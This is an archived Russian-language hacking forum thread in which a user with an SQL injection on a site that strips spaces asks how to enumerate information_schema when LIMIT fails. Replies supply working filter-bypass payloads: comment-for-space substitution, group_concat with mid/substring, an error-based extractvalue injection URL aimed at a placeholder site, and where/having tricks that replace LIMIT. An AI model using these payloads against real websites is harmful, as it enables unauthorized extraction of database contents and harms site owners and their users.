Просмотр полной версии : Как обойти/заменить limit?
Есть скуль, вырезаются пробелы, вместо этого использую скобки (). 5ая версия, хочу пролистать information_schema , но при написании limit(1,1) ничего не выводит, group_concat'ом только первые несколько записей видно, мне их не хватает, подскажите что можно сделать? Условия where работают нормально
HAXTA4OK
22.06.2012, 16:14
/**/ ни кто не отменял....]
select/**/from/**/blalba/**/limit/**/1,1
Tyc00n said:
Есть скуль, вырезаются пробелы, вместо этого использую скобки (). 5ая версия, хочу пролистать information_schema , но при написании limit(1,1) ничего не выводит, group_concat'ом только первые несколько записей видно, мне их не хватает, подскажите что можно сделать? Условия where работают нормально
В чем проблема юзать безпробельно group_concat в связке скажем с mid или substring
синтаксис при инъекции в рерайте(для примера error-based extractvalue)
site.com/123'and(extractvalue(1,concat(0x3a,select(mid(grou p_concat(table_name),1,32))from(information_schema .tables)where(table_schema!='information_schema')) )))and'
Также, например, можно использовать where как лимит
select(schema_name)from(information_schema.schemat a)where(schema_name>'information_schema')
HAXTA4OK said:
/**/ ни кто не отменял....]
/**/ при скули в рерайте не заюзать, также как и прочие фишки с юрленкодом
limit хорошо можно заметь через where или having!
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot